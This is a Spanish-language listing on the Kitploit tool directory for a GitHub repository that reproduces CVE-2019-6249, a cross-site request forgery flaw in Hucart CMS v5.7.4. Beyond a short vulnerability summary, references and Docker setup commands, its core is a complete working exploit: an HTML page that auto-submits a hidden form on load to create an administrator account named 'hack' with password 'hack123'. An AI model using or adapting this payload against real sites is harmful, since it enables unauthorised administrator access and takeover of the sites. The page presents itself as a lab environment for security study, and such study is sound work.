Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms entorno de reproducción

Ver Repositorio
12hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-6249_Hucart cms

一、Resumen de la vulnerabilidad

Nombre de la vulnerabilidad: Vulnerabilidad CSRF en Hucart cms v5.7.4 que permite agregar cuentas de administrador arbitrariamente
Fecha de reporte: 2019-01-13
Descubridor: AllenChen ([email protected])
Página del producto: http://www.hucart.com/
Enlace del software: http://www.hucart.com/
Versión: v5.7.4
ID CVE: CVE-2019-6249

二、Descripción de la vulnerabilidad

Existe una vulnerabilidad CSRF en Hucart cms versión v5.7.4. Cuando un administrador inicia sesión y accede a la siguiente página de prueba CSRF, se puede agregar una cuenta de administrador llamada hack.

三、Código de explotación

El código exp es el siguiente: Agrega una cuenta de administrador con nombre de usuario hack y contraseña hack123.

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

四、Referencias

  • Sitio chino de solicitud de CVE: http://www.iwantacve.cn/index.php/archives/109/
  • Sitio oficial de CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

五、Recreación del entorno (Docker)

En el entorno Docker, ejecuta los siguientes comandos

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

Original EMail:[email protected]

Descargar herramienta